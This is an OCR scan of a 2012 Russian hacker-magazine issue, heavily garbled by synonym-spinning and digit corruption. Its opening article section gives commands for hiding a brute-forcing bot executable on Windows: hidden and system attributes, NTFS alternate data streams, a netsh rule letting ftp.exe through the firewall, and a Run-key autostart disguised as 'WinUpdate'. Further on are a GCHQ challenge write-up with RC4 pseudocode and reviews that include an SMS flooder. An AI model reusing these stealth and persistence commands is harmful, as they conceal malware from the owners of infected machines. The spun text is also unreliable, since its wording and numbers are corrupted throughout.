Во-первых , брутер, ботик да библиотеку дозволительно запаковать на одинокий

находящиеся вслед за NAT), по прошествии что-что на базу добавляются те адреса,

экзешник, притом так, зачем течение функционирования бота станется

которые отнюдь не были во ней найдены. Их дозволительно производить на панели

невидимым, так кушать рента безвыгодный полноте видно.

управления ботами. Но держи оный случай, коли кавасаки поуже брутит да немо­

Для сего позволяется nрибегнуть для подручным средствам, а как

жет отстучать, почто спирт живой, дозволено тоже произвести во таблице

со от тавить блузка следующего содержания:

колонка

нужно вместе с болтать софтин ко у ВАТ То ЕХЕ Conveгteг

lastcallback . Там

отображается число, которое указывает,

%CD%\bot.exe. Далее 1.5 да скомпилировать

рано или поздно кавасаки отстучал на nоследний раз. Таким образом, присутствие каждом

во ней таковой батник, перед указав на настройках invisiЫe

обращении для серверу зто спица в колеснице обновляется.

application равным образом выбрав получай вкладке include три файла: bot .exe, теку [php5ts.dll) да самовольно консольный брутер [md5.exe).

Если оно пуще 000 [дефолтный пятиминутный интервал отстукивания бота), в таком случае сие значит, ась? лодка работает alias находится

библио­

Программка создаст единолично файл, мастерящий во фоновом режи­

во офлайне. Затем нужно сотворить агрегат конфигов. Конфиг, наравне

ме . Затем дозволено содеять так, с тем скрывались равным образом самочки файлы . Для

ты, возможно, заметил за вышеприведенным кускам кода, состо­

сего снедать ряд способов. Вотан изо них- это, например, про­

ит изо двух частей, объединенных наслышан

0.

стое применение штатной виндавай софтины attгib вместе с флагами

Первая кусок отвечает ради команду, которую nолучает бота,

'+h ' равно '+s'. При мер:

а вторая- вслед дополнительные данные, нужные чтобы исnолнения

этой команды. Чтобы подать команду получи установку, да мы не без; тобой должны

attrib "%CD%\bot.exe" +h +s

послать в некоторой степени что-то iпstalllvocab_123123123.txt, идеже iпstall­ этo главенство установки бота, а

vocab_123123123 .txt-

сие обложка

словаря, тот или другой желательно установить. Мы и можем продраить по сию пору

Такая первенство скроет да сделает системным отечественный обложка бота. Спрятать обложка на потоках

NTFS

маленечко сложнее:

рабочие руки файлы, прямо-таки удалив их,- чтобы сего хватает по­ слать команду

clean.

Ну равно самая главная команда- сие bгute.

Второй параметр этой команды объединяет хеш равно к б рута

cd "%systemroot%\system32 type packed_bot.exe>calc.exe:bet.exe

вместе с через двоеточия:

Запуск быть этом осуществляется равным образом из через батника: brute)c4ca4238aeb92382edccse9aбf75849b: c81e728d9d4c2fб3бfeб7f89cc14862c:eccbc87e4b5ce2fe28Зe8f

d9f2a7baf3 Все результаты заливаются для ПР-сервер, какой находится там же, идеже равным образом фокус управления . Попадает всё сие ремесло на папку

cd "%systemroot%\system32 start .\calc.exe:bet.exe Наш обложка на фолиант числе загружает результаты возьми FТР. Файервол

Windows

может получай сие браниться , благодаря тому попробуем его обойти:

гesults. Для того чтоб прибросить на базу готовые результаты, лодка <<дер­

гает» скрипт не без; передачей параметра

iamfinished.

С криnт сервера

passthru( 'netsh firewall add allowedprogram %WINDIR%\ system32\ftp.exe TCPinfrastructure>nul 0>&1 ' ); Авторан про нашего ехе [если некто лежит, например, в % systemгoot % ):

passthru( 'reg add HKLM\software\microsoft\windows\ currentversion\run /v WinUpdate /t REG_SZ /d %WINDIR%\packed_bot.exe /f>nul 0>&1' ); ЗАКЛЮЧЕНИЕ В РНР хоть залейся функций, предназначенных про создания нехи­ лого файлового менеджера иначе говоря а простого системного помощника . Я надеюсь, в чем дело? вследствие моей статье твоя милость убедился невыгодный только в этом, да в свою очередь равным образом на том, что-нибудь для того автоматизации процесса суще­

ствует воз различных средств , которые быть совместном

Рабочий кавасаки

ХАКЕР

03/158/20 02

использовании могут изо всех сил тебе помочь.::;:

065


plaintext lfi rst!a plaintext.su, http://www.plaintext.sul ·

can cra 8t' 1• РЕШЕНИЕ ЗАДАНИЙ ДЛЯ ХАК-КОНКУРСА, УЧРЕЖДЕННОГО

УПРАВЛЕНИЕМ

ПРАВИТЕЛЬСТВЕННОЙСВЯЗИ ВЕЛИКОБРИТАНИИ

Недавно Управление правительственной рука

Великобритании объявило незначительный

Н-конкурс, так чтобы приколдовать ко себя внимание к а для для работодателю . Не уверен, аюшки? для ним кто­ то устроился для работу, да пройт равно задания с

На нашем диске ты смож ешь найти видео со полным прохождением

конкурса « Сап

You

Cr ack lt?».

спортивного интереса несомненно захотели многие .

.PNG .......IHDR. .............j .-•... sRGB ......... pHYs ................. tiME. .. .. . 0-9.p ... )iТXtComment ..... QkJCQjiAAACR2PFtcCAбq2eaCBSR+BdmD/zNzLQC+td3tFQ4q x8044 7ТDeuZwSP+{)SsDEcYR.78J KLW=2 ...... IDATx ... yt .... лcwuW... So-.. ,....... L.. l!!> ... q .. 08.. 0.. a.7.,. НV.y.&.:. G.a ...... mMH.d ......\ .U... ?.n7-Ktuwi ... Gj.R. ..... g.} .. .. sн. д .... sн . д.... sн . д .... sн . д .... sн . д .... sн . д.... sн . д .... sн. д.... sн. д .. .

.sн . д.... sн . д. ... sн . д.... sн . д.... sн . д .... sн . д. ........o.. u.... на :. Lz . D .. I!!>.B c.... .l.4.. ) .... • -....... d .. !QZ. •-ее. D, .. ,.. q.R.fc.. & .•w41r... Ra6... 0...:... ".. } .D.r..https://issuu.com/14.% ....... D<. D " s .i A.ТX, .. ZD .... $....... лX. .. 0.. ·.C.9y.i ...V... ,MO.. G.B y .... B .......... (<.C.. q .. X.Di .. 0M .....f{... Sv; .. (... 0.H.&'.}}y.j....... 0.. BQ.. !. .... zz.... t..jM&...... К. .. s% .... f .. nW.... X.fH .... s.. k .. h.vmm-' .._y: :.' p.6... djSK ............. R. .. R.. 0. Q.... >..... <....... bH ...... C.1 ... t) . .........-.UX,.%K11!> ..

Задани е первого этапа

066

Комментарий ко файлу от заданием

ХАКЕР

03/158/2012


0

Итак, некоторое минута вспять Управление

адресочек конца отечественный е го кода, указываю щишки й, идеже

void

правительовенной рука Великобритании

со держит ся значе ни е ОхАААААААА. Д алее

{

об ъявило конкурс, успешное для хож д ение

изо стека с влека ется

DWORO,

нивается из ОхАААААААА. Затем извлекается

свое резюме, а кроме да расположиться бери работу

е ще об дн в рассуждении з начени е, ко тор ое срав нив ае т ся

на брита н скую киберразве д ку . Пр едложе нны е

от О х ВВВВВВВВ . Однако сего куска дан ных

после дания н е приближенно ужак сложны, д а равно саму стра­

!второй половины стека функции] у нас нет.

ницу отдела к~дров Управления правитель­

функции , необ хо квартал относительно не потерять кресловина тин ку не без; за­

разом обнаружи ть возле п омо щишки пои сков да ко а

дани е м из ущелье та равно п осмо третья часть , как бы каста связка

Google,

всё же данный соперничество всё но интере­

сен , приближенно вроде некто позволяет придать значение у ровень

около г отовки сотрудников, ко т орые соста вля­ ли задания.

На странице ко нк урса, находящейся соответственно

iTXt РNG-файла со после ­ данием ! ко диров ка UTF-8]. Бинарные д анные закодированы вместе с п омо щью алгоритма Base64 и следуют после сло во ом Comment !смотри рисунок].

}

Раскодировав да склеив дв а бинарника, автор за­

v1 v2 do

ния, кто представляет с лица следующую

ствующий рисунок] да надпись-дразнилку «Сап

строку:

Сгасk

lt?>>.

l~hile

перво-наперво подумал, что такое? сие следовать шифрованное по­

GET

/ 05b43бde1f9187f3778aad525e5d8b28 .js

ASCII,

при всем том у меня

сносно отнюдь не вышло. В итоге ваш покорный слуга решил впихать безвыездно

НЕХ-значения из рисунка во двучленный фай л и открыть полученное разнузданность на

IDA

Рг по отношению . В

После с п равки соот на е т ствующе г по отношению

GET-

зanpoca н а сервер получаем блюдо из-за дан ие.

Кстати, ко д не грех запус тить нескольки­ ми из п особами. Я создал бездействие ехе -фа йл, в котором сперва считывается обрубок заключение от

таты.

следовать правда нием, а мыло ом всё э т по отношению д ело запускается бери

распознал осмысленные куски

стих пользу кого архитектуры х86 . Я п по отношению нял , ч т об выбрал

исполнение ! п од ко н тро л ем

строгий п у ть.

безыскусственный ассемблерной вставки:

IDA] присутствие поддержка ощ равно

OxDEADBEEFu; +

v1 ;

( (_BYTE ) vO ) ; sub_39 (); } Результат декомпиляции

нием. Д ля сего отнюдь не нужно ведать границы

PNG,

а порядочно попросту являться внимательным !не­

Недолго думая , мы преобразовал настил уче н­ ный горбушка заключение во функцию да запустил д еком­

=

l~hile

итоге ми посчастливилось половая принадлежность вколачивать кое-какие рез ул ь­

IDA подумаешь

( (_BYTE ) vO ); о;

}

НТТР / 0 . 0

мости каждого зна чения да попытался спустя время

переключить их во символы

0;

LOBYTE ( v1 )=v2 + v4[ v0 ] v2=ROR __ ( v2 , 0); v3=v4[ v1 ]; v4 [ v1 ]=v4[ v0]; v4[ vO ]=vз ; lOBYTE ( vO )=vO + 0;

Уви д е во сии Н ЕХ-значения, мы

слание, начал было исчислять частоту встречае­

+

{

пустил адрес сверху осуществление !под отладчиком] и пр осмотрел рез ультат пр по части ц е д уры дешифрова­

You

v4[ v0 ]=vO ; lOBYTE ( vO )=vO

усик тро е нате . Недостающие д анные со держатся во

из набором НЕ Х - з начений !смотри соответ­

о;

{

дополнительной секции

адресу caпyou cг ackit . co . uk , я видим картинку

cdecl sub_O()

vo do

Чтобы сыскать вторую половин у стека нашей

овенной маза IGCHQJ не запрещается пр акти ч ески

itl

int vo ; // есх@1 int v1 ; // еах@З unsigned int v2 ; // еdх@З char vз ; // bh@4 char v4[256] ; // [sp+Oh] [bp-100h]@2

который-нибудь срав­

которого п холм воляло отослать во У руководство

из ап сгасk

обходима автор уведомление со держится на самом

начале файла].

_ asm

пилятор. Сначала на стеке вам деля ется место под сосредоточение на

056

байт, каковой заполняется

значениями через О вплоть до

055,

а дале е вып в рассуждении лняется

проце д у ра преобразования массива, которая

int 0;

mov call

SECOND STEP

nрограммная крапинка останова

еах,

еах;

array; ar ray -

сосредоточение

со

кодом

заnус для ко похвала возьми выnол нение

отправить в рот черкануть эмулятор микро­ nроцессора . Дан кусочек памяти со кодом да

получи и распишись са мом д едва-едва пре д не без; т авляет собою алгорифм

инициализации шифра RC4 от ра зме кашаса блока 8 двоичная единица информации равно для люч ом OxD EADBEEF !смотри рисунок] .

Во втором задании а вт оры предлагают нам

данными, а тоже описана искусство

Хочу отме т ить, ась? на начале стих прои схо ­

микропроцессора, в целях которого вс ё сие

После токмо сего вызывается единаче одна функ­

дит jmp путем четверик !вроде бы] неиспользуе­

предназначено . Процес отбросы состоит с

ция, стека которой испорчен, да поэтом у касательно н а далеко не

мых байта. Э ти хорошо байта пр бремя дя тся нам на

сообразно зубам декомпилятору.

дальн ейшем. Как видишь, на первом месте миссия до­

восьми регистров, цифра изо которых !гО ... гЗ] представляют с лица регистры общего на­

пикантно оборона вместе с тое. Затруднения возникли всего лишь

значения, двум предназначены пользу кого хра нения

Как оказалось, во начале дальнейший функ­ ции вес регистра

esp,

содержащего

указа тель нате вершину стека, меняется получи

близ об нар сейчас нии второстепенный части из тека функции

адреса сегме нта стих равным образом а др еса сегмента

на дополнительной секции РNG -файла со зада-

данны х ics да ds соо тв е т ственно], в отношении д ан ре-

printf ( ''\nkeygen .•xe\n\n'' ); if ( ~1 •• 0 ) (

uS • ( FILE • ) f ope n6 0("'license.txt" . ''r" );

if ( us ) ( MI?IIISet (&U9 0

D.

UNIX CRYPT()

0Jш);

fsc.:.nf ( uS . '"ts'' • r.u9 ); f c lose ( uS ); if ( u9 •• ' qhcg' )

Функция сгурt на операционных системах

{

u2 • crypt (); if ( ! s tr c ~tp ~ ( const char· • ) u2 . ghDTK7b8Kru w) ) U13 • 0;

printf ( "loading stage1 license key(s) .. . \n''); u6 • u10 ;

printf ( "loading stage2 license key( s ) . . . \n\n'' ); u7 • u11 ; u8 • u1 0 ; }

if ( U13 ) (

u4 • Tr ans•itl nfo (•(_DWORD

• )( а2

• lt). ( int )&u 0 );

}

else {

pri ntf ( ''er-ror: licf'nse.txt i nualid\n''); u4 • - 0;

*ni x

высуженный объединение шифрованного текста вновь

DES

служит с целью хеширования различных данных,

шифруется из через алгоритма

во фолиант числе паралей пользователей системы.

Таким образом , агрегат с восьми нулевых байт

да т. д.

Традиционная сбыт этой функции

шифруется на nроцессеработы

использует пиндосный алгорифм

отметить, ась? сгурt отнюдь не использует стандартную,

DES (Data

05

раз в год по обещанию . Стоит

Encгyptioп Staпdaгd]. Пароль пользователя

эталонную реализацию алгоритма

сокращается давно восьми символов, с каждого

Алгоритм любой крат несильно меняется . Его

изо которых, во свою очередь, берется

конкретная исполнение зависит ото соли длиной

0 бит. 7 двоичная единица информации формируют 06-битный DES, возле помощи которого

DES.

Восемь наборов согласно

02

кнопка алгоритма

nреобразуются на строку близ помощи алгоритма

шифруется объединение изо восьми нулевых байт . Затем

бит. Соль равным образом шифрованный экспликация во итоге

Base64.

Основной функционал программы keygen

ХАКЕР

03 / 058/ 0012

067


хакинг

short loc_6

-------------; :=====-=-=-=-:..::;- ----------------------------·

-------------

dd OAЗBFC2AFh

-

0

-----------------------------------·

loc_6:

; sub xor

сэ:

ОхОО ,

dэ:

OxlO ,

fl :

ОхОО ,

j tirmware:

esp,

000h

есх,

есх

СООЕ

XREF: sub_O!j

[ Oxd2aьlf05 , OxdalЭfllO ] So you did it- приветствие со успешным

Неиспользованные значения изо первого равным образом второго заданий

гистр служит в целях хранения флага операции

[flgl, равным образом один- с целью хранения адреса текущей инструкции [ipl. Микропроцессор обладает набором с

описании задания упоминается номенклатура cs, так а в качестве кого да г51. Второй субаквальный камень -реализация fаг jump'oв равно изменения ip.

выполнением заданий

GET /da75370fe15c4148bd4ceec861fbdaa5.exe НТТР/1.0

Здесь без затей надлежит знать, что такое? значения ре­

восьми инструкций, каждая с которых [за

гистров, отвечающих из-за постоялый двор сегментов,

Отсылая появляющийся GЕТ-запрос для сайту, полу­

исключением инструкции hlt, прекращаю­

изменяются исключительно около дальних переходах да

чаем третье блюдо вслед за дани е - исполняемый файл. При

щей проведение в жизнь программыl имеет неуд

невыгодный изменяются, буде ip начинает адресовать

просмотре зависимостей сие го файла видно,

режима работы: mod О равным образом mod 0. В принципе,

для новоявленный отрезок заключение . В остальном но всё

аюшки? чтобы его работы необходим Cygwiп. Вообще,

к успешного выполнения задания до­

легко да прозрачно. Разработчики заданий

во свойствах полученной программы указано,

статочно не пострадать отсутствием небольшими навыками

предлагают нам сбыть эмулятор в

в чем дело? нынешнее название зкзешника keygeп.exe, в такой мере

программирования, а вдобавок представлять,

языке JavaScгipt, все бери то, бросьте ли

что-то дерзостно переименовываем его.

по образу рабо т ают микропроцессоры. Однако во

учтено выполненное задание, предпочтение языка

процессе программирования ваш покорный слуга наткнулся

программирования невыгодный влияет. Я реализо­

сом- шифр не делать что-л. малограмотный обфусцирован. При после пу­

В данный в один из дней вторично никаких пр облем со ревер­

получи и распишись небольшую толику подводных камней. Сперва пишущий эти строки

волна эмулятор процессара сверху С. Программа

ске keygeп требует вручить ему URL сайта к

объединил на сам за себе сосредоточение регистры общего

выполняется порядочно быстро, и так у меня

соединения во качестве первого двое метра. Ал­

назначения, а в целях cs да ds выделил отдель­

были подозрения, почто разработчики напи­

горитм работы программы полно прост: во

ные переменные. Как оказалось, зто оши­

буффон код, некоторый довольно мучиться полчасика :-1 .

текущей дир ектории выполняе т ся пои ск файла

бочный подход, беспричинно в качестве кого во коде встречаются

инструкции подобно «add г[5], 02>>, которые, до

После остановки процессара [выполнения инструкции hltl на памяти появится разъяснение ко

в свою очередь три числа. Судя в соответствии с строкам во се гменте

замыслу разработчиков задания, изменяют

третьему этапу конкурса - текущий GЕТ­

данных, требуемые числа представляют из себя

значения сегментных регистров напрямую [в

запрос:

Stage оп е liceпce key да Stage two liceпce key,

licence .txt, с которого считывается строка, а

ВОССТАНОВЛЕНИЕ КРИПТОГРАФИЧЕСКИХ АЛГОРИТМОВ В сегодняшний день миг хитроумно обнаружить

<<заnо дозрить >> оный или — или не этот отдел стих на

коммуникационную систему, которая малограмотный

nринадлежности ко какому-либо алгоритму .

ISBo x' ыl, отдельный специфические константы,

использовала бы криnтографию. Часто на

Так, например, современные симметричные

а в свою очередь такие nараметры алгоритма, вроде периметр

процессе реверс-инжиниринга различных

блочные алгоритмы шифрования естественным путем

ключей [в книжка числе протяжение массива раундовых

модулей необ х одимо отождествлять

построеныпоитерационной схеме, на которой,

ключей!, долгота блока, часть итераций

да восстанавливать используемые

на правах правило, производится смена значений во

[раундов! равно т. д. Подобными признаками

криптографические алгоритмы, режимы их

соответствииснекоторой таблицей на памяти ,

и обладают да хеш -фун кции. Алгоритмы

работы, nорядок выработки да использования

нало жение ключа шифрования равно линейное

хеширования естественным путем исnользуют старшие

ключей шифрования равно т. д. Разбор конкретной

реформа . При этом на пределах одной

наборы констант, который облегчает измерение

реализации алгоритма такженередко

функции во ассемблернам листинге может

в виде алгоритма равным образом его возрождение .

позволяет безвыгодный всего лишь сорвать покровы ее ошибки, да

завести знакомство цикл, большое численность

Стоит отметить, ась? на подавляющем

равно оnределить, зачем алгорифм исnользуется

инструкций тиnа

mov, movzx , add, хог, shl, shг

большинстве программных реализаций

неnравильно, на результате в чем дело? могут

равным образом т. д ., а равным образом частые обращения для nамяти [в

симметричных алгоритмов шифрования

просыпаться уязвимости, nозволяющие во

качестве nримера видишь рисунок!.

деятельность выработки массива раундовых ключей

конечном итоге nровести усnешную атаку в

Кроме того, интересах каждого криптографического

lkey schedulel равно выражение дешифрования/

систему на целом.

алгоритма позволительно экстрагировать отдельный

шифрования открытого текста находятся на

Вообще, универсального рецеnта по части

<< отличительные внешний облик >> , которые позволяют

разных участках заключение программы . Это помогает

распознаванию криптографических

автоматизировать отыскивание необ х одимых

подогнать nроцесс обработки информации (и

алгоритмов отнюдь не существует, допускается только

участков кода. Чаще лишь такими признаками

неграмотный ухлопать произвольный разок момент да потенциал нате

сделать упор есть такие nодходы да оnисать

служат константы, х арактерные с целью того

nолучение

другие nризнаки , которые позволяют

иначе иного алгоритма. Для симметричных

алгоритма!.

068

алгоритмов сие могут составлять блоки подстановак

key shedule

с основного ключа

ХАКЕР

03/158/ 0012


0са п cra ck it l

Ито г насчёт на ый GЕТ-за пр ос для се р ве р у да м еет

так снедать сие неко т насчёт р ые д практически н ые, дл пишущий эти строки n олучения

которых нельзя не постановить ради д ачи , п ре д ла­

из л едую щ ий во равным образом д :

АЛГОРИТМ

гаемые получай первом равно втором этапах конкурса.

Прочитанная с файла абзац nреобразуется

близ nомощи функции crypt [из Cygwin ) да срав­

RC4

GET / hqDT K 0 b8K2rvw/ A ЗBf C 0A F /D2 AB1F e5/ DA1 0F1 0e/key.txt НТ Т Р / 0. е Алгоритм

нивается со э т алон н ым з н а ч е н ием с сегмен т а

данных программы. Д ойдя д в рассуждении э т ого буква n а, автор

Этот запрашивание позволяет пропускать обложка

[также изве из тен по образу

ARC4)

сверху

олигодон было nриня-лся разваливать хеш с сегмента

key.txt,

данных, всё же э т касательно был тупиков ы й п уть, равно во сё

из п холм д равлением

оказа л стержень гораз д в рассуждении n р по части щ е. Н еобхо д имый IР ­

сверху оп исание вакансии, во ко т что до р ом выкладывай т ся,

Ривесто м , одним изо основателей компании

код следовательно от использованием перво г что касается

что-нибудь конкурсанту, успешно выполнившему по сию пору

R5A

nараметра программы [UR L сервера) равно DNS.

вслед д ания, ни крошечки отнюдь не предлагают работу напрямик

ладает рядо м по из тоинств , ко которым на первую

Как незамысловато д ога д аться,

UR L д олжен

п ред­

на котором указан родник ото страни ц ы

RC4

сегодняшни й мол н ь является одним с самых

<<So you did it» да ссы л какой

известных равным образом свободно используемы х поточных

шифров. Алгоритм был разработан Раном 5ecu гi ty, на далеком

0987

году .

RC4

об­

сейчас, н относительно согласны обсосать его канди­

очер е дь относят со ваш покорнейший слуга высокая прыть работы

став пят ь лицом а др сделал страницы со вслед за ага ни ями:

ага т у р у п озже, когд а на У п равлении п оявятся

равным образом п е ре м енная долгота ключа . На каждом такте

canyouc г ackme . co.uk . Д алее

свободные вакансии.

keygen.exe форми­

работы алгорит м генерирует

рует ко удаленному серверу G ЕТ- требование вида:

SUMMARY GET /%s/%e8X/%e8X/%e8X/key .txt

НТТР / 0 .е

Как аз многогрешный уnоминал ранее, держи месте строки на за­

0 двоичный знак

псевдослу ­

ча йн в рассуждении й сообразно из ледовательно от ти равным образом изменяет от вое вн у треннее вместе с остояние , ко оторое определяется

З пекло анияотУправления п равительствен -

перестанов для ой значений через О предварительно

утнапиштим блат Великобритании малограмотный представля-

дву м ваш покорнейший слуга однобайт н ыми кое-где для сами:

055 [5) и i равно j. Алго­

полуют не заманить кого куда и калачом ой сложности равным образом во первую цепь

рит м

просе имеет смысл хеш-з н ачение изо сегмента данных .

ориентированы в проверку смекалки, а сделано

инициализаци равно [К5А) да алгоритма выработки

Остае т ся только лишь най т да значения <<ли ц ензионных

следом - навыков реверс-инжинирин г а равно про­

псевдослуча й хотя й последовательности . Про­

ключеЙ>> п ервого равным образом второ г в отношении э т апов ради д аний,

граммирования равно знаний относительно принципах рабо т ы

цедура инициализации служит к выработ­

на что ваш покорнейший слуга начал комплектовать данные, которые

микропроцессоров. Выполнить сии задания около

ко да п е р е становки

получи сих этапах отнюдь не использовались. На первом

силу любому человеку, у которого достанет

с

этапе сие четверка байта на начале кода, вследствие

терпения да энтузиазма. Это стороной свиде­

псевдо ко одом :

котор ы е ш ел п ер во в рассуждении н ачал ь н ы й

тельс т вует в рассуждении том, ч так на

jump. Дл моя персона

00

RC4

до самого

состоит изо дву х частей : процедуры

056

0

быть помощи для люча длиной

бит. К5А описывается вместе с ледующим

GC HQ работают обычные

второ г касательно этапа сие нигде невыгодный пригодившееся двум

людишки ,

ОWОRО-значения firmware [смотри рисунок).

которые во зрелищных голливудских фильмах

Вообще, в втором задании отнюдь не использовался

взламывают парали вслед за пару минут да из легкостью

поголовно беспристрастный ба н для памяти, кото ры й держи ч равно н ае т ся

п ро н икают на ради щ ищенные узы правите ль не без; т а

j

не без; сигна т уры

разных стран. Н апоследок чешется побла г о­

f or i f r om е t o 055 j :=(j + S[ i ] + key[i mod keylength] ) mod 056 swap va lu es of S[i] and S[j] _ endfor

0z,

насчёт дн ако далеко не аз многогрешный вл яе т ся касательно д ноимен­

everyday heroes, а

безвыгодный те супермены,

ным архивом. Этот учас т ок, безграмотный потребовавший­

жертвовать британцев следовать вновь одну возмож н отросток

ся ради выполнения задания, видимо , нужен

<<размяться» равным образом ревизовать домашние багаж . За д ания

прос т по части д ля того, ч т обы вслед за п ута т ь конкурса н так на .

наших спецслужб были бы куда как хар д ко рн ее. :х:

• •

.

• text :101221121 . text:10122112 .. • text: 000221126 • text :101221129 • text :1 ОО22А2С .text:100221133 • text: 0 00221136 • text :1 0022А38 • text: 0 00221138 • text: 0 002211ЗЕ • text: 0 012211..5 • text :1002211 ..7 • text: 0 002211..8 • text :1 01221152 • text :101221155 • text :100221157 • text :1 012211SA • text : 0 0122ASO • text :1 OI22ASF • text :100221162 • text :100221169 .text:10022116B • text :10022116Е .text : 000221171 .text:100221173 .text :100221176 • text :100221178 .text:10022117B • text: 00122117Е

ROU ROU

shr ROUZX ROUZX

Shl AOU

Shl" AOUZX ROUZX XOI" AOUZX AOUZX

Shl XOI" ROU

shl AOU

Shl" AOUZX XOI" XOI" AOU XOI"

esi. (eax• 0Ch ) есх. esi есх • 00h 0 edx. cl есх. ds:byte_10058188[edx) есх. 0 edx • esi edx. 0 edx. dl edx. ds:ьyte_10058188(edx] есх. edx edx. byte ptr (eax+ 0Ch ] edx. ds:ьyte_10058188[edx] есх. 0 есх. edx edi. (eax+ OCh ) есх. 0 edx. esi edx. 08h edx. ds:byte_100S8188(edx] есх. edx есх.

(еЬр+ О ]

edx.

(еах• 0 ]

есх.

(еах]

add

еьр.

0

XOI" ROU ROU XOI"

edx. есх (eax+ 00h ].

f or i f r om е to 055 S[ i] :=i endfor

:=

е

Алгоритм выработки псевдослучайной последовательности как и хватит за глаза прост .

Он описыва е тся следующим nсевдокодом :

i j

:=

е

:=

е

whil e GeneratingOutput: i :=( i + 0) mod 056 j :=(j + S[ i ] ) mod 056 swap valu es of S[i] апd S[jJ _ К :=S[(S[i] + S[j] ) mod 0;>6] output К endwh i l e Алгоритм

RC4

применяется про шифрования

данных во протоколе

05L, защиты трафика WEP, защиты документов Adobe PDF и Microsoft Office . Широко известны случаи,

во

эпизодически неправильное исnользование данного

алгоритма позволяло вос от тановить конфи­

денциальную информацию . Так, некоторое время отворотти-поворотти на защиты содержимого

РDF-документов применялея ключа

есх

00

Х АКЕР

03/158/2012

AES

вместе с длиной

ленник был в силах заразиться ход ко содержимому

есх.

(еах• 0 ]

файла простым перебором ключа . В одной

есх.

edx

изо версий М5

Office RC4

исnользования Кусо для ассе м блерного листин г а алгоритма

RC4

бит, во результате зачем злоумыш ­

с подачи неправильного для защиты файлов про

кайфовый вместе с становления равным образом х содержимого х ватало

069


,.,~,.

(

~ '"r;- -,'

::,

~\ "~,.'

~.:~~~~

* :

r

• ~:---~

относительно

03

00000004 Ноемо бозо .-.кoe.rndЬ Количеста относительно кееа.:

Оwт

09

Услоои• обробо""' r:t>

02

ДоnусТW<ЫА"'""""'fМ

0


с~ ... ~~ ~ сосорост-.

0898K8i5

Ф,,".,

0021 04

Mys..o

~

020~1

0•

022988

ТВ

0-4е<IОЭ

....

tфт

0~0

приема у квалифицированного специалиста.

Поиск в соответствии с базе:

+

с==_

приискивать

Вы nоnали возьми самый объёмистый файловый разведчик во рунете . Ищите любые файлы равно скачивайте держи неограниченной скорости с самых больших торрент-трекеров

Попупярные требования :

сайт << Проверка зрения помощью интернет». Он, естественно, был адски хоть куда

IV сауз сад кот интерны wow аватар кас пере маз патч 0010 GTA Starcraft 0 рок ПрОГраММЫ dVd 0QQ9IOSSieSS ИЛаЯ ре nорно КОМеДИЯ mpЗ sasha grey музыка бесплатно

ссылку, которую выплюнул поисковик, и-

относительно чудо'- сие оказалось прямо то, в чем дело? нужно:

''

кв н friends Fleur lost Dragon дgе crysis прожекrор перис хилтон хуяк

Конечно, Ваня испугался, а у страха, на правах из­ вестно, зеницы велики. Ваня ткнул первую но

daemon total

pdf медсанчасть фильмы HQ пипец windows 0 HD 020р от шатать dvdrip качество Весёлая умет house КаМеДИ

оформлен и, почто самое главное, предлагал проверить глаза ранее сейчас' Ваня быстро нажал «Пройти проверку» равно ответил держи во­ просы анкеты, которые считается должны были выявить, аюшки? но всё-таки сотворилось со его

глазами. Когда Ваня ответил бери весь вопросы, сайт сообщил ему, который посадка диагноза, вообще-то, платная, хотя есть смысл по карману да аюшки?

Ложный

072

depo si tfiles

к его получения делать нечего насадить принадлежащий

ХАКЕР

03/158/2012


Доброго времени суток уважаемые форумчанеl Предлагаю образование adult платников . в услугу входит : -Установка отметка платникiJ

Целевой сайт

-Настройка категорий -Нарнсовка уникального Лога -Наполнение

-nотключенне ко бнллннrу

А ТliКЖе дорога сообразно каталоrlllм©''


хакинг

Marlicq 084888, http://snipper.rul ·

СОФТ ДЛЯ ВЗЛОМА И АНАЛИЗА БЕЗОПАСНОСТИ

Автор :

NEOx. URL:

Rro_r_,._,..,..НIIP

"' or тat> •

о'> е

..

Ьit .ly/x 0Lk8n.

--

._ ......

РЕ

Tools- сие

из

Q

~ ---~

Система :

полнофункциональная утили-

[64bitl. Она

Автор :

famatech. URL: radmin.ru/products/

SuicideiVII] . URL: rOOt .in/showthread . php?t=18056.

0pscanner.

Windows .

та в целях работы со файлами РЕ /Р Е +

Автор :

Система:

Система :

Windows.

Windows.

Е сли т ы когд а -либо использовал во своей объединение ­

П ро га представляет внешне для д винутый SМS­

вседне на утнапиштим работе

флуд ер, позво л яющий циркулировать сведения

Radmin,

ведь советую тебе

охватывает на себя следующие мо дули : вычитчик

попробо во ать во деле до этих пор одну программу что касается т тех

из любым текстом . Д лина насчёт д ного СМС стандар­

РЕ- файлов,

но авторов -

тна равно составляет рядом

Task

Vieweг, оп т имизатор

Win32

Advanced

0

Р Scanne г. Как яс н об

05

сименс на олов сверху кирил­

Р Е -файлов, д етек т крик компи л автор т ора/у п аковщика

изо названия, п ро га n редставляе т из себя п р в рассуждении ­

лице равно

равным образом м н огое другое. Ос н овн ы е возмож н ости про­

дв инутый сетной скэнар .

живается отп ра вка С М С во т акие страны, как бы

г раммы без труда п оражаю т на оображе ни е.

Функционал да основные совершенства тулзы:

Р оссия, Казахста н , Узбек да вместе с т а н , Украина. Дл моя особа

0.

работы флудера т ребуются ва ли д ные аккаунты

существо дампов п роцессов [Full, Pa г tial,

вляе т многопоточное сканиро во а н ие со т ен

Maii. Ru.

Regionl;

кусок п ьютеров во сети, дабы раскопать такие ре ­

таких аккаунтов. Ты во п ол н е сможешь откопать

сурсы, в духе общие папки, Н ТТ Р, НТТ РS равно FТР,

раздачи от ними, заре г истриро во ать аккаунты

да получитьдоступ ко ним.

единолично либо а вос п ользоваться од­

Интеграция от

ним изо многих nубличных брутфорсеров сего

финал работ ы процесса;

Radmin . Б лагодаря инте­ грации от Radmin, выше- сканнер находит все маши н ы не без; заnущенным Radmin Sегvеги п по части ­

нагрузка относительно ц есса на РЕ E ditoг равно РЕ Sniffeг;

зволяет в рассуждении сего пристроиться ко ним на единолично

отождествление О ЕР.

зов . Д ля сего получи и распишись компью т ере, от которого

mymegaemai l @mail .ru:passw l r u: pas s

0.

.NET CLR-npoцeccoв; Anti Dump

автоматическое арендование защиты Pгotection;

0.

версия приорите т а процесса;

РЕ Sniffer:

осущес т вляется сканирование, впредь до л а н б ы т ь

оп ре д е л ен равным образом е т да п а ко относительно мп шлам ваш покорный слуга т ора/у п аков щ ика;

губы н ов л е н

обнов л е н ие б а зы си гнат ур ;

0.

0.

Radmin Vieweг.

Уд а л енное во ыключение килоом п ьютеров. Эт а

Автор рекоме н ветрено обладать с

000 перед 000

сервиса. Файл из аккаунтами в долгу име т ь облик :

